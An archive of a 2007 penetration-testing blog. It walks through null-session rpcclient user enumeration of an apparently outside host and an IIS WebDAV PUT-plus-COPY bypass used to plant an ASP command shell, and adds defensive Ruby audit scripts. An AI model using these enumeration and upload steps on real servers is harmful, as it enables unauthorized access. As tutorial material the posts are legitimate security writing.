Wednesday, August 29, 2007
More of using rpcclient to find usernames
null sessions still rule in 2007...
cg@segfault:~$ rpcclient -U "" x.x.3.96
Password:
rpcclient $> lsaenumsid
found 11 SIDs
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 <--guest
S-1-5-21-2000478354-1708537768-1957994488-500 <--administrator
S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-1-0
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
rpcclient $> lookupnames Administrador
Administrador S-1-5-21-2000478354-1708537768-1957994488-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-504
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-505
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-506
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\TsInternetUser (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\IUSR_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\IWAM_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1003
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> exit
There you have it:
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
oh and thanks for the name of the box too :-)
fun rpcclient info: http://uw714doc.sco.com/en/samba/rpcclient.1.html
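An added example (my own code, not from the post): a small Ruby script that takes the lsaenumsid listing above and sorts the SIDs into well-known groups, built-in accounts (RID 500/501, which keep their RIDs no matter what the account is renamed to) and accounts created after install (RID 1000 and up), so an admin auditing a box can see at a glance what an anonymous caller learns and which SIDs lookupsids will resolve to names. The well-known SID and RID tables are Windows facts; the sample input is the listing from this post.

```ruby
# Added example (not code from the post): classify the SIDs that a
# null-session "lsaenumsid" returns, so a defender auditing a host can see
# which accounts an anonymous caller can discover and resolve.
#
# Facts relied on: a SID is S-1-<authority>-<subauthority>...; machine and
# domain accounts live under S-1-5-21-<three 32-bit values>-<RID>. RIDs 500
# and 501 are the built-in Administrator and Guest and keep those RIDs even
# when the accounts are renamed (the post resolves them first for exactly
# that reason); RIDs from 1000 upward go to accounts created after install.
# S-1-5-32-<RID> are local built-in groups, S-1-1-0 is Everyone and S-1-5-6
# is the Service group.

WELL_KNOWN_SIDS = {
  'S-1-1-0'      => 'Everyone',
  'S-1-5-6'      => 'Service',
  'S-1-5-32-544' => 'BUILTIN\\Administrators',
  'S-1-5-32-545' => 'BUILTIN\\Users',
  'S-1-5-32-547' => 'BUILTIN\\Power Users',
  'S-1-5-32-551' => 'BUILTIN\\Backup Operators',
}.freeze

WELL_KNOWN_RIDS = {
  500 => 'built-in Administrator (RID 500 survives a rename)',
  501 => 'built-in Guest',
}.freeze

# Constructed sample input: the lsaenumsid output captured in the post.
SAMPLE_LSAENUMSID = <<~OUT
  found 11 SIDs
  S-1-5-6
  S-1-5-32-551
  S-1-5-32-547
  S-1-5-32-545
  S-1-5-32-544
  S-1-5-21-2000478354-1708537768-1957994488-501
  S-1-5-21-2000478354-1708537768-1957994488-500
  S-1-5-21-2000478354-1708537768-1957994488-1002
  S-1-5-21-2000478354-1708537768-1957994488-1001
  S-1-5-21-2000478354-1708537768-1957994488-1000
  S-1-1-0
OUT

SidEntry = Struct.new(:sid, :kind, :domain, :rid, :label)

# Classify one SID string. Returns a SidEntry, or nil for lines that are
# not SIDs (such as the "found 11 SIDs" header).
def classify_sid(sid)
  sid = sid.strip
  return nil unless sid.match?(/\AS-1-\d+(?:-\d+)+\z/)

  if WELL_KNOWN_SIDS.key?(sid)
    return SidEntry.new(sid, :well_known, nil, nil, WELL_KNOWN_SIDS[sid])
  end

  parts = sid.split('-').drop(1).map(&:to_i)   # [1, authority, subauths...]
  # Account SID: S-1-5-21-a-b-c-RID => parts == [1, 5, 21, a, b, c, rid]
  if parts.length == 7 && parts[1] == 5 && parts[2] == 21
    rid    = parts.last
    domain = sid.rpartition('-').first           # strip the trailing RID
    if rid < 1000
      label = WELL_KNOWN_RIDS.fetch(rid, "reserved RID #{rid}")
      SidEntry.new(sid, :builtin_account, domain, rid, label)
    else
      SidEntry.new(sid, :created_account, domain, rid, "account created after install (RID #{rid})")
    end
  else
    SidEntry.new(sid, :other, nil, nil, 'unrecognised SID')
  end
end

# Parse a whole lsaenumsid dump into classified entries.
def classify_lsaenumsid(text)
  text.lines.map { |line| classify_sid(line) }.compact
end

# Summarise what an anonymous caller learned: the machine/domain identifier
# and the account RIDs that lookupsids will resolve to names.
def exposure_report(text)
  entries  = classify_lsaenumsid(text)
  accounts = entries.select { |e| e.domain }
  {
    domains: accounts.map(&:domain).uniq,
    builtin: accounts.select { |e| e.kind == :builtin_account }.map(&:rid).sort,
    created: accounts.select { |e| e.kind == :created_account }.map(&:rid).sort,
    groups:  entries.select { |e| e.kind == :well_known }.map(&:label),
  }
end

if __FILE__ == $PROGRAM_NAME
  classify_lsaenumsid(SAMPLE_LSAENUMSID).each do |e|
    puts format('%-48s %-16s %s', e.sid, e.kind, e.label)
  end
  p exposure_report(SAMPLE_LSAENUMSID)
end
```

Run it with ruby and pipe in a saved lsaenumsid listing instead of the sample to audit your own hosts. Note that renaming Administrator buys nothing against this, since RID 500 gives it away; what actually closes the hole is restricting anonymous enumeration on the box (the RestrictAnonymous LSA setting on Windows of this era) rather than the account names.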
-CG
Sunday, August 26, 2007
BackTrack2 is NOT an operating system!!!
here is one of the links; i don't feel like looking up the rest (really not the point) but this has been going on for some time now (really since BT1).
OK i am going to vent for just a sec but i do have a point...
BACKTRACK IS NOT AN OPERATING SYSTEM! it is a TOOL!!
yes obviously you can run it as an operating system (hence the whole point of the rant) but why do you NEED to do that?
frankly the best education comes from building your own attack platform on the linux distro you installed, configured, and hardened yourself. You install, configure and mess with the tools YOU need to do your pentesting (or scanning your local ISP subnet) and don't have a bunch of extra crap you don't need. You get to work through library issues and crap breaking and getting so pissed at your box that you want to dropkick it out the window, but guess what, you LEARN doing all that.
one of the biggest things i see over at LSO and during the rootwars is people having weak linux skills and not being able to compile and use their own tools, so naturally we ask what distro they run and most of the time i get backtrack for an answer :-(
Don't get me wrong, i like backtrack2 as a TOOL: i boot the ISO in VMware, i do what i need to do, then i go back to my linux distro to read email and everything else. I have a couple of personal reasons for that, one of them being deniability with the non-persistent option :-) but mostly for the reasons above; if i am going to go thru the trouble of installing a distro I might as well get something out of the install (linux knowledge-wise) instead of letting someone else do all the work for me.
just my thoughts on it. spend that effort installing that great set of tools that backtrack comes with on your own; you'll learn more, really get an idea if you actually NEED all of those tools, and get the satisfaction of having control over your linux install.
-CG
Thursday, August 23, 2007
Should I be flattered or worried...
Sunday, August 19, 2007
Creating a HTTP OPTIONS auxiliary module for Metasploit
Basically i wanted to do:
cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private
cg@segfault:~/evil/msf3$
but with a metasploit auxiliary module. so i got it going... mostly HD's module, but i changed what needed to be changed to get it to work.
cg@segfault:~/evil/msf3$ ./msfconsole
____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux
msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >
i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.
**more on getting code on the box once you find a PUT
cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109
then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...
**UPDATE
it ended up being the carriage returns (or lack thereof) that were causing me to get a 400 Bad Request error. I couldn't get the MOVE command to work, but the COPY command did.
cadaver http://www.webdav.org/cadaver/
cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit
from there you will want to upload your cmd.asp so you can execute commands on the box.
Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)
Interacting with our cmdx.aspx to list the directory contents of the C drive
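An added example (not the post's Metasploit module, which isn't on this page, and not HD's code): a stand-alone Ruby script that parses an OPTIONS response the way the module's output line summarises it, reads both the Allow and Public headers (IIS sends both and they can differ), and reports the method combinations worth fixing on your own servers. It covers both parts of this post: the OPTIONS scan, and the cadaver session where IIS refused PUT of an .asp but happily took PUT of a .txt followed by COPY, which is why a PUT-only extension filter is no protection once COPY or MOVE are allowed. The two sample responses are constructed from the IIS 6.0 and carnal0wnage.com output captured above; fetch_options is an optional live helper that the samples don't use.

```ruby
# Added example (not the post's module): fetch and parse an HTTP OPTIONS
# response and flag the method combinations that matter when auditing your
# own web servers. "Public:" is a WebDAV/IIS header, "Allow:" the standard
# one; both are read and merged.

require 'socket'

# Methods that modify server content. COPY and MOVE belong here because of
# what the post shows: PUT of upload.asp was refused, PUT of upload.txt plus
# COPY to upload.asp was not, so a filter that only guards PUT by extension
# does not stop the write.
WRITE_METHODS = %w[PUT DELETE COPY MOVE MKCOL PROPPATCH LOCK UNLOCK].freeze

# Constructed sample: the IIS 6.0 response captured in the post.
SAMPLE_IIS_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Connection: close',
  'Server: Microsoft-IIS/6.0',
  'DAV: 1,2',
  'Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
  'Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
  'Content-Length: 0',
  '', ''
].join("\r\n")

# Constructed sample: the method list the module reported for the blog host.
SAMPLE_MINIMAL_RESPONSE = "HTTP/1.1 200 OK\r\nAllow: GET,HEAD,POST,OPTIONS,TRACE\r\nContent-Length: 0\r\n\r\n"

# Parse the status line and headers of a raw HTTP response. Header names
# are case-insensitive, so they are downcased; repeated headers are kept.
def parse_response(raw)
  head = raw.split(/\r?\n\r?\n/, 2).first.to_s
  status_line, *header_lines = head.split(/\r?\n/)
  headers = Hash.new { |h, k| h[k] = [] }
  header_lines.each do |line|
    name, value = line.split(':', 2)
    next unless value
    headers[name.strip.downcase] << value.strip
  end
  { status: status_line.to_s, headers: headers }
end

# Union of the methods announced in Allow and Public, upper-cased.
def allowed_methods(parsed)
  %w[allow public].flat_map { |h| parsed[:headers][h] }
                  .flat_map { |v| v.split(',') }
                  .map { |m| m.strip.upcase }
                  .reject(&:empty?)
                  .uniq
end

# Findings a defender cares about: any write method, TRACE, and the
# PUT+COPY/MOVE combination that defeats per-extension PUT rules.
def assess_methods(methods)
  findings = []
  writes = methods & WRITE_METHODS
  findings << "write methods enabled: #{writes.join(', ')}" unless writes.empty?
  findings << 'TRACE enabled (cross-site tracing / header reflection)' if methods.include?('TRACE')
  if methods.include?('PUT') && !(methods & %w[COPY MOVE]).empty?
    findings << 'PUT together with COPY/MOVE: an extension filter on PUT alone is bypassable by uploading under a harmless name and copying/moving it'
  end
  findings
end

# Live check: send "OPTIONS * HTTP/1.0" over a plain socket, exactly as the
# post did with netcat. Not used by the samples above.
def fetch_options(host, port = 80)
  sock = TCPSocket.new(host, port)
  sock.write("OPTIONS * HTTP/1.0\r\nHost: #{host}\r\n\r\n")
  raw = sock.read
  sock.close
  raw
end

def options_report(raw, label)
  methods = allowed_methods(parse_response(raw))
  { target: label, methods: methods, findings: assess_methods(methods) }
end

if __FILE__ == $PROGRAM_NAME
  [['iis-sample', SAMPLE_IIS_RESPONSE], ['minimal-sample', SAMPLE_MINIMAL_RESPONSE]].each do |label, raw|
    r = options_report(raw, label)
    puts "#{r[:target]} allows #{r[:methods].join(', ')}"
    r[:findings].each { |f| puts "  - #{f}" }
  end
end
```

The server-side fix for the first sample is not a smarter extension filter; it is turning WebDAV (and with it PUT/COPY/MOVE/MKCOL) off on any site that does not need authoring, and disabling TRACE on all of them.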
-CG
Sunday, August 12, 2007
Getting the SILC plugin to work with pidgin on ubuntu 7.04
maybe it's common knowledge to everyone else, but since i couldn't find a good answer with google i'll post up how i got the silc plugin and googletalk to work with pidgin on ubuntu 7.04.
first ubuntu has some stupid ass permissions on a lot of stuff and you have to use sudo for everything, i'm still undecided if ubuntu is staying around, but this can even cause you to be unable to read files and folders that you own (like i said, stupid)
well when you start up pidgin as your user account everything works pretty good, except when you try to run your silc module. you'll probably get a "can't create silc key pair" error. googling won't do you much good, and you'll look where it tells you the key is (/home/$userid/.silc/public_key.pub & private_key.prv) and you won't have any keys there. Copying keys over from another silc client won't work.
so the fix is to run pidgin as root so it will generate the keys for you.
cg@segfault:~$ sudo pidgin
Password:
Public key has been saved into `/root/.silc/public_key.pub'.
Private key has been saved into `/root/.silc/private_key.prv'.
after that, copy those new spiffy keys from /root/ to your home directory
cg@segfault:~$ sudo su
root@segfault:/home/cg# cp /root/.silc/public_key.pub /home/cg/.silc/
root@segfault:/home/cg# cp /root/.silc/private_key.prv /home/cg/.silc/
things should work after that.
i also had issues with ssl support, google actually helped out this time and i found
http://developer.pidgin.im/wiki/FAQssl
you need to compile with the libgnutls package.
sudo apt-get install libgnutls-dev
then recompile from source
./configure --enable-gnutls
MSN and GoogleTalk should work after that.
Wednesday, August 8, 2007
Playing with Kismet
of course like a jackass, i wasn't backing up properly, which is kind of a bummer, but sometimes it's nice to start fresh; if any of you ever sent me an email i wanted to keep, can you please resend it :-)
anyway, the silver lining of all of this is i got a new lappy (Toshiba A135-S4727) with a built-in atheros card so i can finally use that hacking exposed wireless book i borrowed from work (and won't be returning) and can play with some of the wireless hack tools. I'm running Ubuntu 7.04 so it was fairly easy to get things up and running. A couple quick apt-gets and a little editing of the kismet conf file and i was up and running.
$sudo apt-get install madwifi-tools
$sudo apt-get install kismet
after you install the madwifi tools you should see the wifi0 interface when you do an ifconfig
wifi0 Link encap:UNSPEC HWaddr 00-19-7E-8A-BB-F4-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1399800 errors:113005 dropped:98619 overruns:0 frame:1332679
TX packets:98112 errors:2 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:199
RX bytes:283152996 (270.0 MiB) TX bytes:12557358 (11.9 MiB)
Interrupt:16
change directories into /etc/kismet and edit the kismet.conf file to use the madwifi_ag drivers
source=madwifi_ag,wifi0,Atheros
after that you should be good to go:
$sudo kismet
Links
http://www.kismetwireless.net/
http://www.wi-fiplanet.com/tutorials/article.php/3595531